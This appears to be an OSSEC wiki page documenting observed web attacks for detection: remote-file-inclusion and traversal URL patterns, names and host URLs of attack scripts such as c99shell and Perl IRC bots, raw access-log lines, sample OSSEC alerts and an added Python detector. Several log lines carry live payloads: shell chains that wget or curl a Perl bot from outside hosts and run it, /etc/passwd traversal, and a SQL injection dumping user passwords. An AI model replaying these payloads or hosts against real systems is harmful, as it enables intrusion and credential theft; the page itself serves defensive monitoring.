From OSSEC Wiki
List of sites known to have Malicious php/perl scripts
Sites with PHP/Perl scripts
These are some of the sites I have been collecting that host malicious PHP/Perl scripts used for web attacks (or related to trojans/worms).
Note: these sites may host malicious data.
Common patterns (XSS)
- /index2.php?x=<site>
- /index.php?base_dir=<site>
- /index.php?x=../../../../../../etc/passwd
- /main.php?x=<site>
- /error.php?dir=<site>
- /main.inc&G_PATH=<site>
- /htmltonuke.php?filnavn=<site>
- /upgrade_album.php?GALLERY_BASEDIR=<site>
- &mosConfig_absolute_path=<site>
- /admin.php?cal_dir=<site>
- /lib.inc.php?pm_path=<site>
- /mainfile.php?MAIN_PATH=<site>
- /contacts.php?cal_dir=<site>
- /include.php?gorumDir=<site>
- /step_one_tables.php?server_inc=<site>
- /viewgantt.php?root_dir=<site>
- /index.php?site=<site>
- /index.php?content=<site>
- /index.php?content=<any file>
- /index.php?visualizar=<site>
- /addevent.inc.php?agendax_path=<site>
- /displayCategory.php?adminpath=<site>
- /theme.php?THEME_DIR=<site>
- /vw_usr_roles.php?baseDir=<site>
- /initdb.php?absolute_path=<site>
- /header.inc.php?serverPath=<site>
- /start_lobby.php?CONFIG[MWCHAT_Libs]=<site>
- /auth.php?path=<site>
- .php?serverPath=<site>
- onMouseOver=%22window.status='<site>
- /index.php?arquivo=
- /linkpoint.inc.php?config[root_dir]=<site>
- /editsite.php?returnpath=<site>
- /admin_xs.php?phpEx=/../../../../../../../../<file>%00
- /db_connect.php?baseDir=<site>
- /index.php?includeFooter=<site>
- /addentry.php?phpbb_root_path=<site>
- /addevent.inc.php?agendax_path=<location>
- /index.php?AMG_open=comments&AMG_id=<sql_injection>
- .php?dir=<site> (from setup.php?dir= print_category.php?dir= ask_password.php?dir=)
- /db.php?path_local=<site> -- PHP Loja Facil (http://www.milw0rm.com/exploits/3875)
Dump of Web attack scripts
- RFI Vulnerability scanner
- c99shell
- cmdphp_shell
- ShellBOT - http:// triangle-uiuc.org/attack/zero.txt
- no.txt - http:// intrusion.altervista.org/r0x/r0x/.../.../.../no.txt
- ddos.pl - http:// intrusion.altervista.org/r0x/r0x/.../.../.../ddos.pl
- lila.jpg - http:// www.houthandelpolak.nl/images/yello/.xpl/lila.jpg
- safe.txt - http:// usuarios.arnet.com.ar/larry123/safe.txt
- id.txt - perlbot fetcher - http:// 148.245.107.2/.ssh/id.txt
- sela.txt - perlbot - http:// 148.245.107.2/.ssh/sela.txt
- asc - http:// wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????????
- mic22 - http:// www.envio-web.com/speedy/echo.txt
Broken scripts
- Look at G_PATH=YOURCMD (the scanner sent its placeholder instead of a real URL):
65.98.14.194 - - [03/Oct/2007:15:47:25 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=YOURCMD? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"
Worm/Virus sites
[Sober trojan] home.arcor.de scifi.pages.at home.pages.at free.pages.at people.freenet.de
[Hotword trojan] ftp.targetdata.biz ftp.alrobertspublishing.com bp007.no-ip.com
[Warg Bot] media.pixpond.com/l9rd
Full URLs
87.106.75.16 - - [12/Jul/2007:12:48:32 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/leto/kk.txt;wget%20http://tw0team.name/leto/kk.txt;fetch%20http://tw0team.name/leto/kk.txt;curl%20-O%20http://tw0team.name/leto/kk.txt;perl%20kk.txt;rm%20-rf%20kk*? HTTP/1.1" 200 7024 "-" "libwww-perl/5.803"
213.251.187.110 - - [10/Jul/2007:05:00:57 -0300] "GET /dcid/install/index.php?lng=../../include/main.inc&G_PATH=http://legendlist.altervista.org/stringa.txt? HTTP/1.1" 200 6359 "-" "libwww-perl/5.803"
212.68.197.6 - - [10/Jul/2007:14:29:20 -0300] "GET //index.php?link=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/x/bn.txt;wget%20http://tw0team.name/x/bn.txt;fetch%20http://tw0team.name/x/bn.txt;curl%20-O%20http://tw0team.name/x/bn.txt;perl%20bn.txt;rm%20-rf%20bn*? HTTP/1.1" 200 6235 "-" "libwww-perl/5.76"
216.120.227.52 - - [18/Jul/2007:07:55:43 -0300] "GET /dcid/*install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 6361 "-" "libwww-perl/5.803"
212.184.187.186 - - [17/Jul/2007:17:28:19 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.63"
208.116.38.148 - - [17/Jul/2007:18:31:13 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.79"
201.17.129.24 - - [22/Jul/2007:21:46:26 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.lycos.es/poizonbox/r57.txt?? HTTP/1.1" 200 6349 "-" "libwww-perl/5.803"
69.64.37.77 - - [21/Jul/2007:16:51:25 -0300] "GET /wiki/index.php?title=Samples_of_attac...ed_by_ossec&printable=yes/install/index.php?lng=../../include/main.inc&G_PATH=http://www.visiontech-india.com/articles/images/logo2.jpg? HTTP/1.1" 200 7063 "-" "libwww-perl/5.79"
62.141.39.43 - - [26/Jul/2007:10:14:16 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=http://mendesrs.bravehost.com/id.txt? HTTP/1.1" 200 6933 "-" "libwww-perl/5.76"
85.12.31.79 - - [26/Jul/2007:18:13:09 -0300] "GET /wiki/index.php/WebAttacks_links//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7197 "-" "libwww-perl/5.806"
216.120.237.150 - - [26/Jul/2007:19:37:43 -0300] "GET //skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 6235 "-" "libwww-perl/5.806"
66.156.76.235 - - [27/Jul/2007:00:12:18 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7280 "-" "libwww-perl/5.76"
216.120.237.150 - - [28/Jul/2007:22:38:12 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7010 "-" "libwww-perl/5.806"
62.210.190.242 - - [28/Jul/2007:20:16:23 -0300] "GET /wiki/index.php?title=Index.php&printable=yes/*install/index.php?lng=../../include/main.inc&G_PATH=http://guilde-wow.nuxit.net/main? HTTP/1.1" 200 6762 "-" "libwww-perl/5.803"
216.200.125.254 - - [31/Jul/2007:22:01:12 -0300] "GET /htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6291 "-" "libwww-perl/5.75"
216.200.125.254 - - [31/Jul/2007:22:16:20 -0300] "GET /wiki/index.php/htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6884 "-" "libwww-perl/5.75"
216.200.125.254 - - [01/Aug/2007:11:12:28 -0300] "GET /wiki/index.php//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 7120 "-" "libwww-perl/5.75"
69.14.231.114 - - [01/Aug/2007:18:32:00 -0300] "GET /wiki/index.php/main.php?x=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../rox.txt? HTTP/1.1" 200 6834 "-" "libwww-perl/5.79"
69.14.231.114 - - [01/Aug/2007:22:26:47 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/default.php?page=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt? HTTP/1.1" 200 7153 "-" "libwww-perl/5.79"
86.109.164.220 - - [07/Aug/2007:15:01:59 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?p=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 500 607 "-" "libwww-perl/5.79"
74.53.90.130 - - [07/Aug/2007:15:37:44 -0300] "GET /main.php?x=http://ankerz.phpnet.us/Qe3? HTTP/1.1" 500 607 "-" "libwww-perl/5.808"
209.216.253.180 - - [15/Aug/2007:15:47:04 -0300] "GET /dcid/?p=6/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),500(webadmin),2522(psaserv)%0A? HTTP/1.1" 200 11307 "-" "libwww-perl/5.65"
72.22.90.110 - - [15/Aug/2007:03:31:09 -0300] "GET /wiki/index.php/main.php?page=uid=10004(unix)%20gid=10004(unix)%20groups=10004(unix)%0A? HTTP/1.1" 200 6440 "-" "libwww-perl/5.803"
217.160.21.98 - - [14/Aug/2007:19:55:18 -0300] "GET /wiki/index.php/RFI_%3Cwbr%20/%3EVulnerability_scanner//skin/zero_vote/error.php?dir=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 200 6117 "-" "libwww-perl/5.803"
218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
202.67.153.151 - - [26/Aug/2007:21:55:23 -0300] "GET /wiki/admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
202.67.153.151 - - [26/Aug/2007:21:55:22 -0300] "GET /admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
202.67.153.151 - - [28/Aug/2007:20:48:40 -0300] "GET /wiki/modules/tasks/viewgantt.php?root_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
212.59.7.10 - - [29/Aug/2007:09:37:44 -0300] "GET /wiki/index.php/WebAttacks_links/index.php?lng=../../include/main.inc&G_PATH=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 200 6638 "-" "libwww-perl/5.65"
82.165.33.50 - - [05/Sep/2007:11:44:12 -0300] "GET /main.php?x=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 269 "-" "libwww-perl/5.69"
204.10.70.1 - - [07/Sep/2007:15:54:13 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.65"
206.176.210.52 - - [07/Sep/2007:14:21:22 -0300] "GET /wiki/index.php/index.php?site=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20*;cd%20/tmp;lwp-download%20http://triangle-uiuc.org/attack/zero.txt;fetch%20http://triangle-uiuc.org/attack/zero.txt;curl%20-o%20zero.txt%20http://triangle-uiuc.org/attack/zero.txt;wget%20http://triangle-uiuc.org/attack/zero.txt;perl%20zero.txt? HTTP/1.1" 200 6272 "-" "libwww-perl/5.65"
128.241.236.252 - - [09/Sep/2007:13:16:29 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"
128.241.236.252 - - [09/Sep/2007:13:28:33 -0300] "GET /wiki/index.php/OSSECWUI:Install/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6726 "-" "libwww-perl/5.808"
209.240.96.35 - - [17/Sep/2007:13:51:52 -0300] "GET /wiki/index.php?content=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.805"
200.142.86.12 - - [14/Sep/2007:12:36:42 -0300] "GET /wiki/index.php//modules/agendax/addevent.inc.php?agendax_path=http://intrusion.hut2.ru/.../.../.../metodi.txt?? HTTP/1.1" 200 6704 "-" "libwww-perl/5.65"
81.169.128.26 - - [03/Oct/2007:03:44:22 -0300] "GET /wiki/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.69"
210.114.220.92 - - [04/Oct/2007:00:29:38 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.79"
202.133.244.140 - - [18/Sep/2007:17:08:46 -0300] "GET /wiki/index.php//hpgprojects/modules/admin/vw_usr_roles.php?baseDir='http://www.mk-design.com.tw/phpMyVisites/safe.txt? HTTP/1.1" 200 6814 "-" "libwww-perl/5.79"
69.72.144.66 - - [12/Oct/2007:02:09:24 -0300] "GET /wiki/calendar/events/header.inc.php?serverPath=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
211.233.6.126 - - [13/Oct/2007:02:59:25 -0300] "GET /main.php?x=http://www.digitalcrocker.org/..%20/safe? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
207.58.166.142 - - [15/Oct/2007:12:47:45 -0200] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
209.62.7.50 - - [14/Oct/2007:15:02:01 -0200] "GET /ossec-list/index2.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"
85.13.133.246 - - [13/Oct/2007:20:59:27 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?page=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20foi*;wget%20http://infos157.t35.com/foi.txt;cd%20/tmp;lwp-download%20http://infos157.t35.com/foi.txt;cd%20/tmp;fetch%20http://infos157.t35.com/foi.txt;cd%20/tmp;curl%20-o%20foi.txt%20http://infos157.t35.com/foi.txt;cd%20/tmp;GET%20http://infos157.t35.com/foi.txt;cd%20/tmp;lynx%20-source%20http://infos157.t35.com/foi.txt;cd%20/tmp;perl%20foi.txt;rm%20-rf%20foi.txt*? HTTP/1.1" 200 6721 "-" "libwww-perl/5.65"
87.106.11.23 - - [21/Apr/2008:10:47:13 -0300] "GET /wiki/index.php/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email)1'AND%201=1/* HTTP/1.1" 200 6381 "-" "libwww-perl/5.803"
MD5sum of web exploits
Just a list of MD5 checksums of the tools/scripts I have been collecting:
OSSEC alerts for web attacks
Simple Scan looking for multiple vulnerabilities
OSSEC HIDS Notification.
2007 Aug 27 20:07:47
Received From: teletubbies->/var/log/httpd/ossec.access.log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):
218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:01 -0300] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:00 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:59 -0300] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:37 -0300] "GET /ossec-list/2007-April/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:32 -0300] "GET /index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:31 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:20 -0300] "GET /wiki/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:16 -0300] "GET /wiki/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
Scan looking for vulnerable applications
OSSEC HIDS Notification.
2007 Oct 06 07:19:31
Received From: teletubbies->/var/log/httpd/access_log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):
91.121.27.102 - - [06/Oct/2007:07:19:30 -0300] "GET /phpMyChat-0.14.4//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat//chat/messagesL.php3 HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat-0.14.5//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat-0.14.2//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /php/phpmychat//chat/messagesL.php3 HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /forum//chat/messagesL.php3 HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /chats//chat/messagesL.php3 HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /chatroom//chat/messagesL.php3 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /PhpMyChat//chat/messagesL.php3 HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:24 -0300] "GET /phpchat//chat/messagesL.php3 HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
--END OF NOTIFICATION

OSSEC HIDS Notification.
2007 Oct 06 08:06:55
Received From: teletubbies->/var/log/httpd/access_log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //blogs/xmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //community/xmlrpc.php HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //drupal/xmlrpc.php HTTP/1.1" 404 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:42 -0300] "GET //phpadsnew2/adxmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //phpAdsNew2/adxmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //ads/adxmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //Ads/adxmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //phpads/adxmlrpc.php HTTP/1.1" 404 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:40 -0300] "GET //phpadsnew/adxmlrpc.php HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:40 -0300] "GET //phpAdsNew/adxmlrpc.php HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
--END OF NOTIFICATION
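The alerts above fire when OSSEC correlates repeated 4xx responses from one source IP (rule 31151) against requests shaped like the patterns listed earlier. As an added example (not OSSEC's code and not from the original page), the Python below parses this page's access-log format, flags RFI/LFI-shaped query parameters, and applies the same burst correlation; the 10-in-120-seconds threshold and the placeholder IPs/hosts are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import urlsplit, unquote

# Apache combined format, as in every sample on this page (404 status, libwww-perl UA, ...).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """One combined-format line -> dict, or None if the line does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry

def rfi_indicators(url):
    """Query parameters whose value is a remote URL or contains ../ (the page's 'Common
    patterns'). Splits on '&' by hand so ';'-chained shell commands are not extra params."""
    hits = []
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        value = unquote(value).lower()
        if value.startswith(("http://", "https://", "ftp://")) or "../" in value:
            hits.append(name)
    return hits

def rfi_attempts(lines):
    """Requests, whatever their status code, that carry an RFI/LFI-shaped parameter."""
    entries = filter(None, map(parse_line, lines))
    return [{"ip": e["ip"], "params": p, "status": e["status"], "ua": e["ua"]}
            for e in entries if (p := rfi_indicators(e["url"]))]

def find_error_bursts(lines, threshold=10, window=120):
    """Source IPs causing `threshold` 4xx responses within `window` seconds, the correlation
    shape of OSSEC rule 31151 above; 10-in-120s is this example's assumption, not OSSEC's file."""
    entries = sorted(filter(None, map(parse_line, lines)), key=lambda e: e["ts"])
    recent, flagged = defaultdict(deque), {}
    for e in entries:
        if not 400 <= e["status"] < 500:
            continue
        q = recent[e["ip"]]
        q.append(e["ts"])
        while (q[-1] - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) >= threshold and e["ip"] not in flagged:
            flagged[e["ip"]] = e["ts"]  # moment the burst crosses the threshold
    return flagged

# Constructed sample modelled on the page's log lines; IPs and hosts are placeholders.
SCANNER = "198.51.100.7"
PROBES = [("index2.php", "x"), ("admin.remository.php", "mosConfig_absolute_path"),
          ("upgrade_album.php", "GALLERY_BASEDIR"), ("admin.php", "cal_dir"), ("main.php", "x"),
          ("error.php", "dir"), ("htmltonuke.php", "filnavn"), ("viewgantt.php", "root_dir"),
          ("theme.php", "THEME_DIR"), ("auth.php", "path")]
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Aug/2007:20:05:00 -0300] "GET /wiki/index.php?title=Main_Page HTTP/1.1" 200 6539 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [27/Aug/2007:20:05:30 -0300] "GET /install/index.php?lng=../../include/main.inc'
    '&G_PATH=http://shell.example.invalid/id.txt? HTTP/1.1" 200 6361 "-" "libwww-perl/5.803"',
] + [
    f'{SCANNER} - - [27/Aug/2007:20:06:{10 + i:02d} -0300] "GET /{script}?{param}='
    f'http://shell.example.invalid/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"'
    for i, (script, param) in enumerate(PROBES)
]
```

Note that the RFI check fires on the 200-status line too, which the 4xx-count correlation alone would miss, so the two checks complement each other.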
